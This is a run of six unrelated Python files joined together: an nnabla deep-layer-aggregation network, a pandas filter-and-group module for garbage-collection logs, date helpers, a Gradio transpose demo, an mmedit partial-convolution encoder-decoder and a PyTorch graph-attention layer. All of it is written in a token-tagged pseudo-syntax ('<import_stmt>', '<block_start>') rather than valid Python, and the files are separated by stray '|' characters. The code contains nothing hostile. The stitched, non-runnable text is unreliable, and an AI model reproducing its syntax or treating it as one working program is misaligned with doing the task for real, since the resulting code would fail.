"""<import_stmt>numpy<as>np<import_stmt>nnabla<as>nn<import_stmt>nnabla.parametric_functions<as>PF<import_stmt>nnabla.functions<as>F<import_from_stmt>nnabla.initializer UniformInitializer ConstantInitializer NormalInitializer calc_normal_std_he_forward calc_normal_std_he_backward<import_from_stmt>nnabla.logger logger<import_from_stmt>nnabla.utils.save save<import_from_stmt>nnabla.utils.nnp_graph NnpNetworkPass<import_from_stmt>models.networks.initializers he_initializer bilinear_depthwise_initializer bilinear_initializer<line_sep>RNG=np.random.RandomState(214)<def_stmt>pf_depthwise_deconvolution x kernel stride=(1 1) pad=(1 1) dilation=(2 2) with_bias=<false> w_init=<none> b_init=<none> channel_last=<false><block_start>out_map=x.shape[3]<if>channel_last<else>x.shape[1]<if_stmt>channel_last<block_start>w_init=np.transpose(w_init (0 2 3 1))<block_end>x=PF.deconvolution(x out_map kernel pad=pad stride=stride dilation=dilation w_init=w_init with_bias=with_bias b_init=b_init group=out_map channel_last=channel_last)<line_sep><return>x<block_end><def_stmt>pf_affine r num_classes=1000 channel_last=<false><block_start>r=PF.convolution(r num_classes (1 1) channel_last=channel_last w_init=NormalInitializer(sigma=0.01 rng=RNG) name='fc')<line_sep><return>F.reshape(r (r.shape[0] -1) inplace=<false>)<block_end><def_stmt>pf_convolution x ochannels kernel pad=<none> stride=(1 1) dilation=<none> with_bias=<false> w_init=<none> b_init=<none> channel_last=<false><block_start><return>PF.convolution(x ochannels kernel stride=stride pad=pad dilation=dilation with_bias=with_bias w_init=w_init b_init=b_init channel_last=channel_last)<block_end><def_stmt>shortcut x ochannels stride shortcut_type test channel_last=<false><block_start>axes=3<if>channel_last<else>1<line_sep>ichannels=x.shape[axes]<line_sep>use_conv=shortcut_type.lower()<eq>'c'<if_stmt>ichannels<ne>ochannels<block_start><assert_stmt>(ichannels<times>2<eq>ochannels)<or>(ichannels<times>4<eq>ochannels)<if_stmt>shortcut_type.lower()<eq>'b'<block_start>use_conv=<true><block_end><block_end><if_stmt>use_conv# Convolution does everything.
# Matching channels, striding.
<block_start><with_stmt>nn.parameter_scope("shortcut_conv")<block_start>x=PF.convolution(x ochannels (1 1) stride=(stride stride) with_bias=<false> channel_last=channel_last)<line_sep>x=PF.batch_normalization(x axes=[axes] batch_stat=<not>test)<block_end><block_end><else_stmt># shortcut block is slightly different for dla
<block_start><if_stmt>stride<ne>1# Stride
<block_start>x=F.max_pooling(x kernel=(stride stride) stride=(stride stride) channel_last=channel_last)<block_end><if_stmt>ichannels<ne>ochannels<block_start>x=PF.convolution(x ochannels (1 1) stride=(1 1) with_bias=<false> channel_last=channel_last)<line_sep>x=PF.batch_normalization(x axes=[axes] batch_stat=<not>test)<block_end><block_end><return>x<block_end><def_stmt>basicblock x residual ochannels stride test channel_last=<false><block_start><def_stmt>bn h<block_start>axes=[3<if>channel_last<else>1]<line_sep><return>PF.batch_normalization(h axes=axes batch_stat=<not>test)<block_end><if_stmt>residual<is><none><block_start>residual=x<block_end><with_stmt>nn.parameter_scope("basicblock1")<block_start>h=F.relu(bn(PF.convolution(x ochannels (3 3) stride=(stride stride) pad=(1 1) with_bias=<false> channel_last=channel_last)))<block_end><with_stmt>nn.parameter_scope("basicblock2")<block_start>h=bn(PF.convolution(h ochannels (3 3) pad=(1 1) with_bias=<false> channel_last=channel_last))<block_end><return>F.relu(F.add2(h residual))<block_end><def_stmt>bottleneck x ochannels shortcut_type stride test channel_last=<false><block_start><def_stmt>bn h<block_start>axes=[3<if>channel_last<else>1]<line_sep><return>PF.batch_normalization(h axes=axes batch_stat=<not>test)<block_end><assert_stmt>ochannels%4<eq>0<line_sep>hchannels=ochannels/4<with_stmt>nn.parameter_scope("bottleneck1")<block_start>h=F.relu(bn(PF.convolution(x hchannels (1 1) with_bias=<false> channel_last=channel_last)))<block_end><with_stmt>nn.parameter_scope("bottleneck2")<block_start>h=F.relu(bn(PF.convolution(h hchannels (3 3) pad=(1 1) stride=stride with_bias=<false> channel_last=channel_last)))<block_end><with_stmt>nn.parameter_scope("bottleneck3")<block_start>h=bn(PF.convolution(h ochannels (1 1) with_bias=<false> channel_last=channel_last))<block_end><with_stmt>nn.parameter_scope("bottleneck_s")<block_start>s=shortcut(x ochannels stride shortcut_type test channel_last)<block_end><return>F.relu(F.add2(h s))<block_end><def_stmt>layer x block ochannels count stride shortcut_type test channel_last=<false><block_start><for_stmt>i range(count)<block_start><with_stmt>nn.parameter_scope("layer{}".format(i+1))<block_start>x=block(x ochannels stride<if>i<eq>0<else>(1 1) shortcut_type test channel_last=channel_last)<block_end><block_end><return>x<block_end><def_stmt>_make_conv_level x ochannels convs test stride=1 dilation=1 channel_last=<false><block_start>axes=[3<if>channel_last<else>1]<for_stmt>i range(convs)<block_start><with_stmt>nn.parameter_scope("conv{}".format(i+1))<block_start>s=(stride stride)<if>i<eq>0<else>(1 1)<line_sep>x=pf_convolution(x ochannels (3 3) stride=s pad=(dilation dilation) dilation=(dilation dilation) with_bias=<false> channel_last=channel_last)<line_sep>x=F.relu(PF.batch_normalization(x axes=axes batch_stat=<not>test))<block_end><block_end><return>x<block_end><def_stmt>root x children ochannels test concat_axis=1 kernel_size=1 channel_last=<false><block_start>axes=3<if>channel_last<else>1<with_stmt>nn.parameter_scope("root")<block_start>rng=np.random.RandomState(313)<line_sep>x=F.concatenate(x *children axis=axes)<line_sep>x=pf_convolution(x ochannels (kernel_size kernel_size) pad=((kernel_size-1)<floordiv>2 (kernel_size-1)<floordiv>2) stride=(1 1) with_bias=<false> w_init=he_initializer(ochannels kernel_size rng) channel_last=channel_last)<line_sep>x=PF.batch_normalization(x axes=[axes] batch_stat=<not>test)<line_sep>x=F.relu(x)<block_end><return>x<block_end><def_stmt>upsample x ochannels test kernel_size=4 
channel_last=<false><block_start>rng=np.random.RandomState(313)<line_sep>axes=3<if>channel_last<else>1<with_stmt>nn.parameter_scope("up")<block_start>x=pf_convolution(x ochannels (1 1) stride=(1 1) with_bias=<false> w_init=he_initializer(ochannels kernel_size rng) channel_last=channel_last)<line_sep>x=F.relu(PF.batch_normalization(x axes=[axes] batch_stat=<not>test))<line_sep>ichannels=x.shape[axes]<line_sep>x=pf_depthwise_deconvolution(x (kernel_size kernel_size) pad=(1 1) stride=(2 2) dilation=(1 1) with_bias=<false> w_init=bilinear_depthwise_initializer(ichannels kernel_size) channel_last=channel_last)<block_end><return>x<block_end><def_stmt>_make_tree_level1 x children block ochannels level test level_root=<false> stride=1 channel_last=<false><block_start>axes=3<if>channel_last<else>1<line_sep>ichannels=x.shape[axes]<line_sep>bottom=F.max_pooling(x kernel=(stride stride) stride=(stride stride) channel_last=channel_last)<if>stride<g>1<else>x<if_stmt>ichannels<ne>ochannels<block_start>residual=pf_convolution(bottom ochannels (1 1) stride=(1 1) pad=<none> with_bias=<false> channel_last=channel_last)<line_sep>residual=PF.batch_normalization(residual axes=[axes] batch_stat=<not>test)<block_end><else_stmt><block_start>residual=bottom<block_end><with_stmt>nn.parameter_scope('block1')<block_start>b1=block(x residual ochannels stride test channel_last=channel_last)<block_end><with_stmt>nn.parameter_scope('block2')<block_start>b2=block(b1 b1 ochannels 1 test channel_last=channel_last)<block_end>_children=[bottom b2]<if>level_root<else>[b2]<if_stmt>children<block_start>_children<augadd>children<block_end>x=root(b1 _children ochannels test kernel_size=1 channel_last=channel_last)<line_sep><return>x bottom<block_end><def_stmt>_make_tree_level2 x children block ochannels level test level_root=<false> stride=1 channel_last=<false><block_start><with_stmt>nn.parameter_scope('node1')<block_start>ag1,bottom1=_make_tree_level1(x <none> block ochannels level test <false> stride channel_last=channel_last)<block_end><with_stmt>nn.parameter_scope('node2')<block_start>x,_=_make_tree_level1(ag1 [bottom1] block ochannels level test level_root 1 channel_last=channel_last)<block_end><return>x<block_end><def_stmt>dla_imagenet x num_classes num_layers test residual_root=<false> tiny=<false> channel_last=<false><block_start>"""
Args:
x : Variable
num_classes : Number of classes of outputs
num_layers : Number of layers of DLA chosen from (34).
test : Construct net for testing.
tiny (bool): Tiny imagenet mode. Input image must be (3, 56, 56).
"""<line_sep>layers={# 18: ((2, 2, 2, 2), basicblock, 1),
34:((1 1 1 2 2 1) (<false> <false> <false> <true> <true> <true>) basicblock)# 50: ((3, 4, 6, 3), bottleneck, 4),
# 101: ((3, 4, 23, 3), bottleneck, 4),
# 152: ((3, 8, 36, 3), bottleneck, 4)
}<line_sep>ochannels=[16 32 64 128 256 512]<line_sep>levels,levels_root,block=layers[num_layers]<line_sep>strides=[1 2 2 2 2 2]<line_sep>logger.debug(x.shape)<line_sep>axes=3<if>channel_last<else>1<with_stmt>nn.parameter_scope("conv1")<block_start>stride=(1 1)<line_sep>r=pf_convolution(x 16 (7 7) pad=(3 3) stride=stride with_bias=<false> channel_last=channel_last)<line_sep>r=F.relu(PF.batch_normalization(r axes=[axes] batch_stat=<not>test))<block_end>hidden={}<line_sep>hidden['conv0']=r<line_sep>logger.debug(r.shape)<with_stmt>nn.parameter_scope("level0")<block_start>r=_make_conv_level(r ochannels[0] levels[0] test=test stride=strides[0] channel_last=channel_last)<line_sep>hidden['level0']=r<line_sep>logger.debug(r.shape)<block_end><with_stmt>nn.parameter_scope("level1")<block_start>r=_make_conv_level(r ochannels[1] levels[1] test=test stride=strides[1] channel_last=channel_last)<line_sep>hidden['level1']=r<line_sep>logger.debug(r.shape)<block_end><with_stmt>nn.parameter_scope("level2")<block_start>r,_=_make_tree_level1(r <none> block ochannels[2] levels[2] test levels_root[2] stride=strides[2] channel_last=channel_last)<line_sep>hidden['level2']=r<line_sep>logger.debug(r.shape)<block_end><with_stmt>nn.parameter_scope("level3")<block_start>r=_make_tree_level2(r <none> block ochannels[3] levels[3] test levels_root[3] stride=strides[3] channel_last=channel_last)<line_sep>hidden['level3']=r<line_sep>logger.debug(r.shape)<block_end><with_stmt>nn.parameter_scope("level4")<block_start>r=_make_tree_level2(r <none> block ochannels[4] levels[4] test levels_root[4] stride=strides[4] channel_last=channel_last)<line_sep>hidden['level4']=r<line_sep>logger.debug(r.shape)<block_end><with_stmt>nn.parameter_scope("level5")<block_start>r,_=_make_tree_level1(r <none> block ochannels[5] levels[5] test levels_root[5] stride=strides[5] channel_last=channel_last)<line_sep>hidden['level5']=r<line_sep>logger.debug(r.shape)<block_end>pool_shape=r.shape[-2:]<if_stmt>channel_last<block_start>pool_shape=r.shape[1:3]<block_end>r=F.average_pooling(r pool_shape channel_last=channel_last)<with_stmt>nn.parameter_scope("fc")<block_start>r=pf_affine(r num_classes channel_last=channel_last)<block_end>logger.debug(r.shape)<line_sep><return>r hidden<block_end># Upsampling portion of DLA
<def_stmt>DLAUp x test residual_root=<false> channel_last=<false><block_start>r,hidden=dla_imagenet(x num_classes=1000 num_layers=34 test=test channel_last=channel_last)<line_sep>callback=NnpNetworkPass(<true>)<line_sep>callback.remove_and_rewire('fc')<line_sep>ochannels=[256 128 64 32]<with_stmt>nn.parameter_scope("up16")<block_start>x=upsample(hidden['level5'] ochannels[0] test kernel_size=4 channel_last=channel_last)<line_sep>hidden['up16']=x<block_end><with_stmt>nn.parameter_scope("up8")<block_start>x=root(x [hidden['level4']] ochannels[0] test kernel_size=3 channel_last=channel_last)<line_sep>x=upsample(x ochannels[1] test kernel_size=4 channel_last=channel_last)<line_sep>hidden['up8']=x<block_end><with_stmt>nn.parameter_scope("up4")<block_start><with_stmt>nn.parameter_scope("residual_level3")<block_start>level4up=upsample(hidden['level4'] ochannels[1] test kernel_size=4 channel_last=channel_last)<with_stmt>nn.parameter_scope("level3up_root")<block_start>level3up=root(level4up [hidden['level3']] ochannels[1] test kernel_size=3 channel_last=channel_last)<block_end><with_stmt>nn.parameter_scope("x_root")<block_start>x=root(x [level3up] ochannels[1] test kernel_size=1 channel_last=channel_last)<block_end><block_end>x=upsample(x ochannels[2] test kernel_size=4 channel_last=channel_last)<line_sep>hidden['up4']=x<block_end><with_stmt>nn.parameter_scope("up2_b")<block_start>level3up_b=upsample(level3up ochannels[2] test kernel_size=4 channel_last=channel_last)<block_end><with_stmt>nn.parameter_scope("up2_c")<block_start>level3up_c=upsample(hidden['level3'] ochannels[2] test kernel_size=4 channel_last=channel_last)<with_stmt>nn.parameter_scope("level3up_c_root")<block_start>level3up_c=root(hidden['level2'] [level3up_c] ochannels[2] test kernel_size=3 channel_last=channel_last)<block_end><with_stmt>nn.parameter_scope("level2up_root")<block_start>level2up=root(level3up_b [level3up_c] ochannels[2] test kernel_size=3 channel_last=channel_last)<block_end><with_stmt>nn.parameter_scope("x_root")<block_start>x=root(x [level2up] ochannels[2] test kernel_size=3 channel_last=channel_last)<block_end><block_end><return>x<block_end> |
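A minimal graph-construction sketch for the two entry points above, assuming nnabla and the repository's models.networks.initializers helpers are importable; the 224x224 input resolution and 1000 classes are illustrative:

import nnabla as nn

x = nn.Variable((1, 3, 224, 224))              # NCHW input batch
logits, hidden = dla_imagenet(x, num_classes=1000, num_layers=34, test=True)
print(logits.shape)                            # (1, 1000)
features = DLAUp(x, test=True)                 # upsampling head, reuses the backbone parameter scopes
print(features.shape)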
# filter_and_group.py
#
# Given a set of filters, and groupings, take data from pandas gc event dataframes,
# and return a modified subset of the data that follows the passed filters/groups.
# Note: It is possible to export the following function to hold a state variable of the
# modified subset: apply_filter
#
# The functions defined are used within in the plotting functions, and are not called in the GCGC notebook
#
<import_stmt>matplotlib<line_sep># filter_and_group
#
# Given a list of datasets, use provided parameters to group and split
# the data into useable pandas series.
#
<def_stmt>filter_and_group datasets # list of gc_event_dataframes
group_by=<none> # creates a group for each unique value in a column specified
filter_by=<none> # a function to be applied to the row of the table. Should return a boolean
labels=<none> # a list of strings to describe the datasets passed in
column="Duration_milliseconds" # the column name that we are analyzing from our dataset
colors=<none> # a list of colors. If none are provided, deterministic colors are returned for each dataset
column_timing=<none># Overrides the timing column to collect, if provided. All values in the column must be ints/floats
# Apply the filters, if any
<block_start><if_stmt>filter_by<block_start>datasets=apply_filter(datasets filter_by)<block_end># Create the labels if none provided
<if_stmt><not>labels<block_start>labels=[str(num+1)<for>num range(len(datasets))]<block_end><if_stmt><not>column_timing<block_start>column_timing="TimeFromStart_seconds"<block_end># Group into lists of X/Y associated data with labels.
timestamp_groups=[]# For time of event
datapoint_groups=[]# For data in 'column'
group_labels=[]# Label to describe the group.
<if_stmt>group_by<block_start>timestamp_groups,datapoint_groups,group_labels=arrange_into_groups(datasets group_by column column_timing labels)<block_end><else_stmt><block_start>timestamp_groups,datapoint_groups,group_labels=arrange_no_groups(datasets column column_timing labels)<block_end># Add the colors.
<if_stmt><not>colors<block_start>colors,alphas=get_colors_and_alphas(len(group_labels))<block_end><else_stmt><block_start>alphas=[1<for>i range(len(colors))]<block_end><if_stmt>column_timing<eq>"DateTime"# find the minimum time in any timestamp_group, and subtract it from all recorded values.
<block_start>timestamp_groups=__remove_datetime_scaling(timestamp_groups)<block_end><return>timestamp_groups datapoint_groups group_labels colors alphas<block_end><import_stmt>pandas<as>pd<line_sep># apply_filter
#
# For each dataset, apply each filter. Create a copy of the data to be fitered,
# so the original data is not modified or lost. Return the list of copied & filetered datasets
#
<def_stmt>apply_filter datasets filter_by=<none><block_start>dfs=[]<if_stmt>filter_by# create a copy, to be modified
<block_start><for_stmt>df datasets<block_start>dfs.append(df.copy())<block_end># the reason to use index is to update the actual value
<for_stmt>i range(len(dfs))# Apply functions return a boolean. Only retain rows that evaluate to True
<block_start>dfs[i]=dfs[i][dfs[i].apply(filter_by axis=1)]<block_end><block_end><else_stmt># Return the same data if no filters needed
<block_start>dfs=datasets<block_end><return>dfs<block_end># get_colors_and_alphas
#
# Given then number of colors, returns that many colors from a preset
# sequence of repeating colors, beginning at the start of the sequence
#
<def_stmt>get_colors_and_alphas number_of_colors<block_start>preset_colors=[(230/255 25/255 75/255) (60/255 180/255 75/255) (215/255 215/255 25/255) (0/255 130/255 200/255) (245/255 130/255 48/255) (145/255 30/255 180/255) (70/255 240/255 240/255) (240/255 50/255 230/255) (210/255 245/255 60/255) (250/255 190/255 212/255) (0/255 128/255 128/255) (220/255 190/255 255/255) (170/255 110/255 40/255) (255/255 250/255 200/255) (128/255 0/255 0/255) (170/255 255/255 195/255) (128/255 128/255 0/255) (255/255 215/255 180/255) (0/255 0/255 128/255) (128/255 128/255 128/255) (0 0 0)]<line_sep># https://sashamaps.net/docs/resources/20-colors/
colors=[]<line_sep>alphas=[]<while_stmt>number_of_colors<g>len(preset_colors)# In the case where we need MANY colors, copy the cycle and add more.
<block_start>preset_colors=preset_colors+preset_colors<block_end><for_stmt>idx range(number_of_colors)<block_start>colors.append(preset_colors[idx])<line_sep>alphas.append(1)<block_end><return>colors alphas<block_end># arrange_into_groups
#
# Given a grouping pattern, and set of filtered datasets, creates a list of
# X and Y datalists for each group found in the passed dataset.
#
<def_stmt>arrange_into_groups datasets group_by column column_timing labels<block_start>timestamp_groups=[]<line_sep>datapoint_groups=[]<line_sep>group_labels=[]<for_stmt>idx,df enumerate(datasets)# Loop through all provided log datasets
<block_start><if_stmt><not>df.empty<block_start><if_stmt>group_by<not><in>df<block_start>print("Warning: group_by group "+str(group_by)+" column not in dataset with columns "+str(df.columns))<block_end><elif_stmt>column<not><in>df<block_start>print("Warning: column \""+str(column)+"\" not in dataset with columns "+str(df.columns))<block_end><elif_stmt>column_timing<not><in>df<block_start>print("Warning: column_timing \""+str(column_timing)+"\" not in dataset with columns "+str(df.columns))<block_end><else_stmt># A non-empty df contains both X and Y columns.
<block_start>groups={}# Create a dictionary to hold unique groups
<if_stmt>column_timing<eq>"DateTime"<block_start>print("Case number 1")<line_sep>timing=pd.Series(matplotlib.dates.date2num(df[column_timing]))<block_end><else_stmt><block_start>timing=df[column_timing]<block_end><for_stmt>group,time,datapoint zip(df[group_by] timing df[column])<block_start><if_stmt><not>group<block_start>group="( "+str(group_by)+" = None )"# None groups should all be put together
<block_end><if_stmt>group<not><in>groups# Create a new group for each unique item
<block_start>groups[group]=[[] [] str(labels[idx])+": "+str(group)]<block_end># add the datapoints and time, based on the grouping
groups[group][0].append(time)<line_sep>groups[group][1].append(datapoint)<block_end># Sort keys so groups print in the same order between files
keys=list(groups.keys())<line_sep>keys.sort()<for_stmt>key keys<block_start>timestamp_groups.append(pd.Series(groups[key][0]))<line_sep>datapoint_groups.append(pd.Series(groups[key][1]))<line_sep>group_labels.append(groups[key][2])<block_end><block_end><block_end><block_end><return>timestamp_groups datapoint_groups group_labels<block_end># arrange_no_groups
#
# Given no grouping pattern, take data from datasets, place them
# into X and Y datasets.
#
<def_stmt>arrange_no_groups datasets column column_timing labels<block_start>timestamp_groups=[]<line_sep>datapoint_groups=[]<line_sep>group_labels=[]# Included in case no data is extracted from a df
<for_stmt>idx,df enumerate(datasets)# Make sure both the columns are present, and rows are present
<block_start><if_stmt><not>df.empty<and>column_timing<in>df<and>column<in>df<block_start><if_stmt>column_timing<eq>"DateTime"<block_start>timestamp_groups.append(pd.Series(matplotlib.dates.date2num(df[column_timing])))<block_end><else_stmt><block_start>timestamp_groups.append(df[column_timing])<block_end>datapoint_groups.append(df[column])<line_sep>group_labels.append(labels[idx])<block_end><block_end><return>timestamp_groups datapoint_groups group_labels<block_end># Given that column_timing is set to "DateTime" characters,
# shift them into TimePassed in Seconds scaling.
<def_stmt>__remove_datetime_scaling timestamp_groups# Each list of timestamp groups contains numbers in matplotlib datetime formats.
# First, determine the minimum time present
# Then, subtract from all that minimum time to make the values begin from zero.
# Then, scale the times into seconds (x84600). Scaling explained here: https://matplotlib.org/stable/api/dates_api.html
<block_start>min_time=timestamp_groups[0].min()<line_sep>print(len(timestamp_groups))<for_stmt>index range(1 len(timestamp_groups))<block_start>min_time=min(min_time timestamp_groups[index].min())<block_end>print(min_time)<line_sep>new_times=[]<for_stmt>timestamp_list timestamp_groups<block_start>timestamp_list=[(time-min_time)<times>86400<for>time timestamp_list]# scaling
new_times.append(timestamp_list)<block_end># Note the datatype returned. Series rather than list
<return>pd.Series(new_times)<block_end> |
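A small end-to-end sketch of the grouping/filtering pipeline above; the column names match the defaults used in this module, while the event names and values are made up:

import pandas as pd

gc_log_a = pd.DataFrame({
    "TimeFromStart_seconds": [0.1, 0.5, 1.2, 2.0],
    "Duration_milliseconds": [10.0, 3.5, 22.1, 7.8],
    "EventName": ["Young", "Young", "Full", "Young"],
})
gc_log_b = pd.DataFrame({
    "TimeFromStart_seconds": [0.2, 0.9, 1.5],
    "Duration_milliseconds": [5.0, 12.3, 4.4],
    "EventName": ["Young", "Full", "Young"],
})
times, durations, labels, colors, alphas = filter_and_group(
    [gc_log_a, gc_log_b],
    group_by="EventName",                                    # one series per unique event per log
    filter_by=lambda row: row["Duration_milliseconds"] > 4,  # keep only the longer pauses
    labels=["log_a", "log_b"],
)
for label, xs, ys in zip(labels, times, durations):
    print(label, list(xs), list(ys))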
"""Date and time functions
Refactored from Cufflinks' 'date_tools.py' module.
Credits to @jorgesantos.
"""<import_stmt>datetime<as>dt<def_stmt>get_date_from_today delta strfmt='%Y%m%d'<block_start>""" Returns a string that represents a date n numbers of days from today.
Parameters
----------
delta : int
number of days
strfmt : string
format in which the date will be represented
"""<line_sep><return>(dt.date.today()+dt.timedelta(delta)).strftime(strfmt)<block_end><def_stmt>string_to_date string_date strfmt='%Y%m%d'<block_start>""" Converts a string format date into datetime.
Parameters
----------
string_date : string
date in string format
strfmt : string
format in which the input date is represented
"""<line_sep><return>dt.datetime.strptime(string_date strfmt).date()<block_end><def_stmt>int_to_date int_date<block_start>""" Converts an int format date into datetime.
Parameters
----------
int_date : int
date in int format
Example
-------
int_date(20151023)
"""<line_sep><return>string_to_date(str(int_date))<block_end><def_stmt>date_to_int date strfmt='%Y%m%d'<block_start>""" Converts a datetime date into int.
Parameters
----------
date : datetime
date in datetime format
strfmt : string
format in which the int date will be generated
Example
-------
date_to_int(dt.date(2015,10,23),'%Y')
"""<line_sep><return>int(date.strftime(strfmt))<block_end> |
<import_stmt>gradio<as>gr<import_stmt>numpy<as>np<def_stmt>transpose matrix<block_start><return>matrix.T<block_end>iface=gr.Interface(transpose gr.inputs.Dataframe(type="numpy" datatype="number" row_count=5 col_count=3) "numpy" examples=[[np.zeros((3 3)).tolist()] [np.ones((2 2)).tolist()] [np.random.randint(0 10 (3 10)).tolist()] [np.random.randint(0 10 (10 3)).tolist()] [np.random.randint(0 10 (10 10)).tolist()] ])<line_sep>iface.test_launch()<if_stmt>__name__<eq>"__main__"<block_start>iface.launch()<block_end> |
# Copyright (c) OpenMMLab. All rights reserved.
<import_stmt>torch.nn<as>nn<import_from_stmt>mmcv.runner auto_fp16 load_checkpoint<import_from_stmt>mmedit.models.builder build_component<import_from_stmt>mmedit.models.registry BACKBONES<import_from_stmt>mmedit.utils get_root_logger<line_sep>@BACKBONES.register_module()<class_stmt>PConvEncoderDecoder(nn.Module)<block_start>"""Encoder-Decoder with partial conv module.
Args:
encoder (dict): Config of the encoder.
decoder (dict): Config of the decoder.
"""<def_stmt>__init__ self encoder decoder<block_start>super().__init__()<line_sep>self.encoder=build_component(encoder)<line_sep>self.decoder=build_component(decoder)<line_sep># support fp16
self.fp16_enabled=<false><block_end>@auto_fp16()<def_stmt>forward self x mask_in<block_start>"""Forward Function.
Args:
x (torch.Tensor): Input tensor with shape of (n, c, h, w).
mask_in (torch.Tensor): Input tensor with shape of (n, c, h, w).
Returns:
Tuple[torch.Tensor, torch.Tensor]: Output tensor with shape of (n, c, h', w') and the corresponding final mask.
"""<line_sep>enc_outputs=self.encoder(x mask_in)<line_sep>x,final_mask=self.decoder(enc_outputs)<line_sep><return>x final_mask<block_end><def_stmt>init_weights self pretrained=<none><block_start>"""Init weights for models.
Args:
pretrained (str, optional): Path for pretrained weights. If given
None, pretrained weights will not be loaded. Defaults to None.
"""<if_stmt>isinstance(pretrained str)<block_start>logger=get_root_logger()<line_sep>load_checkpoint(self pretrained strict=<false> logger=logger)<block_end><elif_stmt>pretrained<is><none># Here, we just use the default initialization in `ConvModule`.
<block_start><pass><block_end><else_stmt><block_start><raise>TypeError('pretrained must be a str or None')<block_end><block_end><block_end> |
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.init<as>init<import_stmt>torch.nn.functional<as>F<import_from_stmt>config DEVICE<class_stmt>GraphAttentionLayer(nn.Module)<block_start>"""
reference: https://github.com/xptree/DeepInf
"""<def_stmt>__init__ self att_head in_dim out_dim dp_gnn leaky_alpha=0.2<block_start>super(GraphAttentionLayer self).__init__()<line_sep>self.in_dim=in_dim<line_sep>self.out_dim=out_dim<line_sep>self.dp_gnn=dp_gnn<line_sep>self.att_head=att_head<line_sep>self.W=nn.Parameter(torch.Tensor(self.att_head self.in_dim self.out_dim))<line_sep>self.b=nn.Parameter(torch.Tensor(self.out_dim))<line_sep>self.w_src=nn.Parameter(torch.Tensor(self.att_head self.out_dim 1))<line_sep>self.w_dst=nn.Parameter(torch.Tensor(self.att_head self.out_dim 1))<line_sep>self.leaky_alpha=leaky_alpha<line_sep>self.init_gnn_param()<assert_stmt>self.in_dim<eq>self.out_dim<times>self.att_head<line_sep>self.H=nn.Linear(self.in_dim self.in_dim)<line_sep>init.xavier_normal_(self.H.weight)<block_end><def_stmt>init_gnn_param self<block_start>init.xavier_uniform_(self.W.data)<line_sep>init.zeros_(self.b.data)<line_sep>init.xavier_uniform_(self.w_src.data)<line_sep>init.xavier_uniform_(self.w_dst.data)<block_end><def_stmt>forward self feat_in adj=<none><block_start>batch,N,in_dim=feat_in.size()<assert_stmt>in_dim<eq>self.in_dim<line_sep>feat_in_=feat_in.unsqueeze(1)<line_sep>h=torch.matmul(feat_in_ self.W)<line_sep>attn_src=torch.matmul(F.tanh(h) self.w_src)<line_sep>attn_dst=torch.matmul(F.tanh(h) self.w_dst)<line_sep>attn=attn_src.expand(-1 -1 -1 N)+attn_dst.expand(-1 -1 -1 N).permute(0 1 3 2)<line_sep>attn=F.leaky_relu(attn self.leaky_alpha inplace=<true>)<line_sep>adj=torch.FloatTensor(adj).to(DEVICE)<line_sep>mask=1-adj.unsqueeze(1)<line_sep>attn.data.masked_fill_(mask.byte() -999)<line_sep>attn=F.softmax(attn dim=-1)<line_sep>feat_out=torch.matmul(attn h)+self.b<line_sep>feat_out=feat_out.transpose(1 2).contiguous().view(batch N -1)<line_sep>feat_out=F.elu(feat_out)<line_sep>gate=F.sigmoid(self.H(feat_in))<line_sep>feat_out=gate<times>feat_out+(1-gate)<times>feat_in<line_sep>feat_out=F.dropout(feat_out self.dp_gnn training=self.training)<line_sep><return>feat_out<block_end><def_stmt>__repr__ self<block_start><return>self.__class__.__name__+' ('+str(self.in_dim)+' -> '+str(self.out_dim<times>self.att_head)+')'<block_end><block_end> |